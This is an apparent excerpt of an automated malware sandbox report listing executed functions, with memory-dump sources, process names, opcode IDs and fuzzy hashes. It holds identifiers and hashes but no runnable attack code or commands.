                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ea510108c3de7a59903a76f15ac9d86d5e5e363bb9821b8ad30030e7c87f80b
                        • Instruction ID: d7f6260b3d01502b24586761c23f5dfaa7d9db345c1940305a3166d81c43621a
                        • Opcode Fuzzy Hash: 6ea510108c3de7a59903a76f15ac9d86d5e5e363bb9821b8ad30030e7c87f80b
                        • Instruction Fuzzy Hash: 7391A570E1895D8FDB94EF68C895BA8B7F1FF68300F5045A5E00DE72A6DA34A981CF01
                        Function 00007FFD9BAA1289 Relevance: .2, Instructions: 165COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 619f296961c08576e1fe245ced71952da8e36e2c5626f2dbba849d1a53f85090
                        • Instruction ID: 0224becef33366b736f33ed8a7b519ee328e68686de903ffcb8122fc2a70a486
                        • Opcode Fuzzy Hash: 619f296961c08576e1fe245ced71952da8e36e2c5626f2dbba849d1a53f85090
                        • Instruction Fuzzy Hash: 9A515F71E09A5D9FDB94EF98C465AECB7F2FF6A300F410169E00DE7292CE64A941CB50
                        Function 00007FFD9BAA6051 Relevance: .1, Instructions: 145COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c0a8b658a03558efdbf595b571fa93b7cdbd09a95c6c23cdb3a9f36a1409126
                        • Instruction ID: bb5dcf2aae878ca7ae13a047b056d885e0404df2c54a4de53cfe25a38de0bb5c
                        • Opcode Fuzzy Hash: 4c0a8b658a03558efdbf595b571fa93b7cdbd09a95c6c23cdb3a9f36a1409126
                        • Instruction Fuzzy Hash: 1E415D31E0965D8FDB94DFA8D864AFDBBF1EF59300F05017AE009E7296CA785A41CB50
                        Function 00007FFD9BAA51BC Relevance: .1, Instructions: 140COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aea757bed6c187e9eb00c4c55ad61b1d08c6eb0c33ee33b286144e4841c17146
                        • Instruction ID: 64632c66430b9b79b854a76216d8f7fbe18a39d17261ee350c80abad049cb342
                        • Opcode Fuzzy Hash: aea757bed6c187e9eb00c4c55ad61b1d08c6eb0c33ee33b286144e4841c17146
                        • Instruction Fuzzy Hash: 44410071E19A5D8FDF94EF98C8A5AACBBF1FF68300F040469D009E7255DB74A881CB41
                        Function 00007FFD9BAA0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de9eefabddb109c5cc1567ff0ab6827cc7e224d8b33aa400718bdb374a6a64e0
                        • Instruction ID: 1cdb202e0cd5b05a5b988fc3810954f9f35179275f606b658af37f93cd0d5a74
                        • Opcode Fuzzy Hash: de9eefabddb109c5cc1567ff0ab6827cc7e224d8b33aa400718bdb374a6a64e0
                        • Instruction Fuzzy Hash: 28414E71E19A5D9FDB94EFA8C454AACBBF1FF59314F01017AE009EB2A5CB34A941CB10
                        Function 00007FFD9BAA51C0 Relevance: .1, Instructions: 129COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a12051582e89edfd3b303cf86d91d852c351efb4878e81a252c78eb452cd5689
                        • Instruction ID: 3dd503a7185170bc332e70388fd9158774119d8be063d71aacddb3ff36e061c0
                        • Opcode Fuzzy Hash: a12051582e89edfd3b303cf86d91d852c351efb4878e81a252c78eb452cd5689
                        • Instruction Fuzzy Hash: 4F41FD70E15A5D8FDF94EF58C498AADBBF1FF58310F00046AE009E7265CB74A881CB40
                        Function 00007FFD9BAA4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f82ee50caff339bb0edfce8c1b0eb8af1c0c2cc3910b70c1c259b3f52e3a0ef
                        • Instruction ID: ac0f80c56fbf72fb82a99f1152bc6f2ce9856d5040c9d560fb18f615b444cceb
                        • Opcode Fuzzy Hash: 7f82ee50caff339bb0edfce8c1b0eb8af1c0c2cc3910b70c1c259b3f52e3a0ef
                        • Instruction Fuzzy Hash: 80414A70E1464D8FEB84EFA8C8A5AECBBF1FF58311F0441B9E018E7296DA346841CB41
                        Function 00007FFD9BAA1162 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 578b98ce7ad55ad0f5e0438008c22d5561de0d33fb2cf626cac1a30735dd9a53
                        • Instruction ID: 55d16f4922b179600769abe9979115757519e3f2b970de417882486f489b03ee
                        • Opcode Fuzzy Hash: 578b98ce7ad55ad0f5e0438008c22d5561de0d33fb2cf626cac1a30735dd9a53
                        • Instruction Fuzzy Hash: 0D314A71E0A64E8FDB55DFA8C8606EDBBF1FF59310F10016AE019E7291CB799941CB90
                        Function 00007FFD9BAA4DCD Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bb3989fb59f9af422685f31cc69ec748c51a3a8a67cd52fd41b62ab07d7bf84
                        • Instruction ID: a6b59499f52c95e6fd9614a9338a063b3eb11c08aece9389f7e28b7992fe2dc4
                        • Opcode Fuzzy Hash: 4bb3989fb59f9af422685f31cc69ec748c51a3a8a67cd52fd41b62ab07d7bf84
                        • Instruction Fuzzy Hash: 11416D30E19A0D8FEB54EB98C865AEDBBF1FF58311F050179E008E72A6CE746950CB51
                        Function 00007FFD9BAA5F71 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f670df35bc2a5ea8149e4f6c97fcd34820d325e1e536e203deabb17bca8947d
                        • Instruction ID: 2dce0ac43093752dda1550f783eda6a69067defb924f7e9d2d39b82ec8175127
                        • Opcode Fuzzy Hash: 2f670df35bc2a5ea8149e4f6c97fcd34820d325e1e536e203deabb17bca8947d
                        • Instruction Fuzzy Hash: 8701C43190F78E8FDB539BA4CC24AEE7FB0EF46310F0501A6E149C71A2C6785559C7A1
                        Function 00007FFD9BAA5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d3b5d4bdb10e15432301298db85715e4edf79ae056aa0c55a277534f8b8dc1d1
                        • Instruction ID: 45a08a3eb324a60f731c766da1e3cfbed6f6c7413fbfa2ecfa893e6fd094502a
                        • Opcode Fuzzy Hash: d3b5d4bdb10e15432301298db85715e4edf79ae056aa0c55a277534f8b8dc1d1
                        • Instruction Fuzzy Hash: 7A119E70E1491C8FDBA4EB68D895BECB7B1FF58301F4041AAD40DE32A6DE306A81CB40
                        Function 00007FFD9BAA532C Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2290499f1c362a662a2c3c8fcf774bdd13bc1a0dcfd95deece4fc631bf330a2b
                        • Instruction ID: a116334050c4452c736bf27be9671fa8e8aa37c44445b6f21c0cb2bf03ff2bb8
                        • Opcode Fuzzy Hash: 2290499f1c362a662a2c3c8fcf774bdd13bc1a0dcfd95deece4fc631bf330a2b
                        • Instruction Fuzzy Hash: 8CF0F975E0981D8FDFE4EB5898557ECB3B2FF98311F5040A6C00DE3251CE746A858B50
                        Function 00007FFD9BAA08B1 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b913bc0726f6fe7dd10236df9727815db0bd522c3be2c42a90936e8dbbdb407c
                        • Instruction ID: 02ddd8facc7bfb8a15295a4d941114fdc230fb5d7e82b177450074b7d55fc048
                        • Opcode Fuzzy Hash: b913bc0726f6fe7dd10236df9727815db0bd522c3be2c42a90936e8dbbdb407c
                        • Instruction Fuzzy Hash: 85E0923294F28D4BE7726B6089651E87B21FF46704F4B16F6D08C450E3DA9CA6588365

                        Executed Functions

                        Function 00007FFD9BAC2010 Relevance: 15.3, Strings: 11, Instructions: 1544COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 2efbc2c88f49968b0049c59cc1f9d067c68b8c6bb89400f12dc2b6b0863b2ea9
                        • Instruction ID: 5a9dac6a7d9a814d1a12468fe6b016a793bef30be0a4ff32933f5325a17adc92
                        • Opcode Fuzzy Hash: 2efbc2c88f49968b0049c59cc1f9d067c68b8c6bb89400f12dc2b6b0863b2ea9
                        • Instruction Fuzzy Hash: 93D2C570E0962D8FDBA8EF18C895BA9B7B1FF59301F5041E9D01DE7295CA74AA81CF40
                        Function 00007FFD9BAC0600 Relevance: 7.0, Strings: 5, Instructions: 777COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$"$-$[${
                        • API String ID: 0-3019564589
                        • Opcode ID: 5221e0b1e07a5367051705b9f464daa17a8a59318774f3da2993a21d9baf95ea
                        • Instruction ID: c9e818105bffe6ad59ca27ea7bf8477784c27c5bace1fbc3bfc29e6d7da4c692
                        • Opcode Fuzzy Hash: 5221e0b1e07a5367051705b9f464daa17a8a59318774f3da2993a21d9baf95ea
                        • Instruction Fuzzy Hash: 6762E870E0966D8FDBA4EF68C895BA8B7F1FF58301F5045A9D04DE7295CA34AA81CF40
                        Function 00007FFD9BAC18DD Relevance: .4, Instructions: 384COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c30c93757f86e613686a3991016804b8fc6b09a265aa82c95ac9fa11d05565f
                        • Instruction ID: 6c51f89490d59a684b06eaad255adfc64ae3a9411db8bc24ce41fddf2d145f12
                        • Opcode Fuzzy Hash: 0c30c93757f86e613686a3991016804b8fc6b09a265aa82c95ac9fa11d05565f
                        • Instruction Fuzzy Hash: 71D14C71E1965D8FDBA8EF58C8A4BBCB7A1FF68304F4441B9E01D972D2DA746981CB00
                        Function 00007FFD9BAC3530 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 186c991e47306e4d362db839a40459ee8917614146aa535fa71145d2a97cb43f
                        • Instruction ID: 226c6f837a1be67090bccab855fb35867ec7ba993206d58e28d21ab2bfdbca11
                        • Opcode Fuzzy Hash: 186c991e47306e4d362db839a40459ee8917614146aa535fa71145d2a97cb43f
                        • Instruction Fuzzy Hash: 94C14870E1A65D8FDB68EFA8C861ABDB7F1FF19305F100179D009A72A1CB79A941CB41
                        Function 00007FFD9BAC4205 Relevance: .3, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1990c4c6bafa235b3e400d159b6dfe6de02cb0214d340e336a07b38805949567
                        • Instruction ID: bd34086bf9df69d7e9897a33acd6ce09410e7905092f98be69e1e693901d40c0
                        • Opcode Fuzzy Hash: 1990c4c6bafa235b3e400d159b6dfe6de02cb0214d340e336a07b38805949567
                        • Instruction Fuzzy Hash: EEB1DB70E0895D8FDB94EF68C895BA8B7F1FF59300F1005A9E05DE72A6DA34A981CF41
                        Function 00007FFD9BAC0CB1 Relevance: .3, Instructions: 251COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7da9339a128490ae9c746626fd5f17952a09adec4dba842da25d6b5b62a86aa
                        • Instruction ID: 8e4ca7fe42e4b293508c48ef3cdb1dd264668f0720ce0d6089c4198acc8de29d
                        • Opcode Fuzzy Hash: c7da9339a128490ae9c746626fd5f17952a09adec4dba842da25d6b5b62a86aa
                        • Instruction Fuzzy Hash: 78A16170E1591D8FDBA5EF18C8A5AE9B7B1FF58301F5005E5A40DE72A6CA34AE81CF40
                        Function 00007FFD9BAC09D9 Relevance: .2, Instructions: 250COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ce367d4c820eb99e2a6fe516f34b752a5789f15bea3778160d514477820d9e94
                        • Instruction ID: 715931ead253ca5e3cf373a499e46440acda51ee31802abc3e049bea07f96e09
                        • Opcode Fuzzy Hash: ce367d4c820eb99e2a6fe516f34b752a5789f15bea3778160d514477820d9e94
                        • Instruction Fuzzy Hash: D891A670E1895D8FDB94EF68C899BA8B7F1FF59300F5045A5E00DE72A6DA34A981CF01
                        Function 00007FFD9BAC1289 Relevance: .2, Instructions: 165COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 33d892697ae6c6b58c95eb472a1844ee113d3090440c7d998d75a2d69f955f70
                        • Instruction ID: 61cd9595d4aad6cfa56cdd20f01f6a0c9b50365fae016bb07a1bf450f3cf9d30
                        • Opcode Fuzzy Hash: 33d892697ae6c6b58c95eb472a1844ee113d3090440c7d998d75a2d69f955f70
                        • Instruction Fuzzy Hash: B6513D75E19A5D8FDB94EF98C465AFCB7B1FF69300F410169E00DE7292CA64A9418B40
                        Function 00007FFD9BAC6051 Relevance: .1, Instructions: 144COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec5c5d7debc2b0cb073b7e0d0d8c030040955be64f5dc510251b4fc4c8e8dc70
                        • Instruction ID: 8dd4fafd71205da8abcedae098da9804c5edfc87d8047c2893f09bebe6df7dc3
                        • Opcode Fuzzy Hash: ec5c5d7debc2b0cb073b7e0d0d8c030040955be64f5dc510251b4fc4c8e8dc70
                        • Instruction Fuzzy Hash: AC416A30E0965D8FDB94EFA8D864AFDB7F0EF59301F00017AE009E32A6CA785A41CB50
                        Function 00007FFD9BAC0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22a1cfefddca0db42165fd1eab4561ec9f6d6d4306d3d64326b34f6874423c9b
                        • Instruction ID: 322701bc9f74fd71ee9e4983312be3d4dd8b9479f51fb5484ce09abbb5f2302d
                        • Opcode Fuzzy Hash: 22a1cfefddca0db42165fd1eab4561ec9f6d6d4306d3d64326b34f6874423c9b
                        • Instruction Fuzzy Hash: 43415E71E19A5D8FDB94EFA8C468AACBBF1FF59304F010179D009E72A5CB34A941CB00
                        Function 00007FFD9BAC4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42f3954c78102ab1c876b3c503df66cbe22cd1f03f3c615be0abd163691dc051
                        • Instruction ID: ac624db7a9def3150e779419cc9e53aa4be977e6bc6995f771a1a2f59d378cbe
                        • Opcode Fuzzy Hash: 42f3954c78102ab1c876b3c503df66cbe22cd1f03f3c615be0abd163691dc051
                        • Instruction Fuzzy Hash: 1E413970E1464D8FEB84EFA8C8A5AECBBF1FF18311F0441B9E018E7296DA346941CB41
                        Function 00007FFD9BAC1162 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e32fecefe5457d519beeff2426a88595d0417660cc83ff07d650d2d6227e383
                        • Instruction ID: 53a44aa1cf3e31f1185d380a88745a7e181ab47e317aa5063c97f1e7fbe27069
                        • Opcode Fuzzy Hash: 6e32fecefe5457d519beeff2426a88595d0417660cc83ff07d650d2d6227e383
                        • Instruction Fuzzy Hash: 86314C71E0964E8FDB55EFA4C8606EDBBF1FF59310F1001AAE019E3291CA789941CB90
                        Function 00007FFD9BAC4DCD Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46e105d4ffc16c109873f636620bc21099b676ac9123615d8dce8ed1e921902c
                        • Instruction ID: b97daf20eb6e0f9d28b31d1007290f41296e5add099cbf183fc040a734583138
                        • Opcode Fuzzy Hash: 46e105d4ffc16c109873f636620bc21099b676ac9123615d8dce8ed1e921902c
                        • Instruction Fuzzy Hash: 50414C30E19A1D8FEB54EB98C865AEDBBB1FF58315F050179E008E72A6CE746941CB41
                        Function 00007FFD9BAC5F71 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1a67e7d5f32046b52c2646ccce81afea32ff0f449a7ccce4ea17a07d3a9742e
                        • Instruction ID: 9382b43ff7864e73eece16bc584185b410529d31886a5a75e51e5b877c3debd3
                        • Opcode Fuzzy Hash: c1a67e7d5f32046b52c2646ccce81afea32ff0f449a7ccce4ea17a07d3a9742e
                        • Instruction Fuzzy Hash: DA01D63190F78D8FDB52ABA4CC25AEA7FF0EF46310F0501A6E189C71A2CA685559C791
                        Function 00007FFD9BAC5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction ID: 6526781b03dc3f622d0611afb241b29964c422842cd22d85c42adfcefa59eb58
                        • Opcode Fuzzy Hash: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction Fuzzy Hash: AD119270E1491C8FDBA4EB68D855BECB7B1FF58201F4041AAD40DE32A6DE346D81CB00
                        Function 00007FFD9BAC5317 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction ID: 2113dd16e7de5dc703a43727b1cef5a6ae0519d21f5c2b9618ae4a9531cec9d0
                        • Opcode Fuzzy Hash: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction Fuzzy Hash: 74017C31E0991D8EDFA4EB6898667FDB3B1FF58200F5000BAD04CE3252CE741A858B01
                        Function 00007FFD9BAC08B1 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.1817128627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ffd9bac0000_wininit.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4dba0b6c62e1a8de695f5f50b46deebcb58a296354ed17f8031b0145ae539c3a
                        • Instruction ID: 920a703428b3e3c585ab926799eed8bffdf9623d3d15064dcf2ecf1a36d33ecb
                        • Opcode Fuzzy Hash: 4dba0b6c62e1a8de695f5f50b46deebcb58a296354ed17f8031b0145ae539c3a
                        • Instruction Fuzzy Hash: 96E0923294F28D4BE7317B608A661F97B20FF42700F8755F6D05C460E3DE9866588346

                        Executed Functions

                        Function 00007FFD9BAC2010 Relevance: 15.3, Strings: 11, Instructions: 1544COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 4d074ac546884b13ae268282925f548dcc5f8f1586ae1744ec7da33e649213f2
                        • Instruction ID: 002e463e5c80f31c99f3db9406dbe4139232be89d2380a7d41fe5a81554a500a
                        • Opcode Fuzzy Hash: 4d074ac546884b13ae268282925f548dcc5f8f1586ae1744ec7da33e649213f2
                        • Instruction Fuzzy Hash: 48D2C570E0962D8FDBA8EF18C895BA9B7B1FF59301F5041E9D01DE7295CA74AA81CF40
                        Function 00007FFD9BAC0600 Relevance: 7.0, Strings: 5, Instructions: 777COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$"$-$[${
                        • API String ID: 0-3019564589
                        • Opcode ID: 94531123ec34e82bfb09fd0414b3c1e3b9c09da582baa6e8968913ca4aeb09f3
                        • Instruction ID: cc3214d4026986659bb47d8f0d143917156da083055cb848ed8691a98bf2fe2f
                        • Opcode Fuzzy Hash: 94531123ec34e82bfb09fd0414b3c1e3b9c09da582baa6e8968913ca4aeb09f3
                        • Instruction Fuzzy Hash: 8B62E970E0966D8FDBA4EF68C895BA8B7F1FF58301F5041A9D04DE7295CA349981CF40
                        Function 00007FFD9BAC18DD Relevance: .4, Instructions: 384COMMON
                        Download Yara Rule
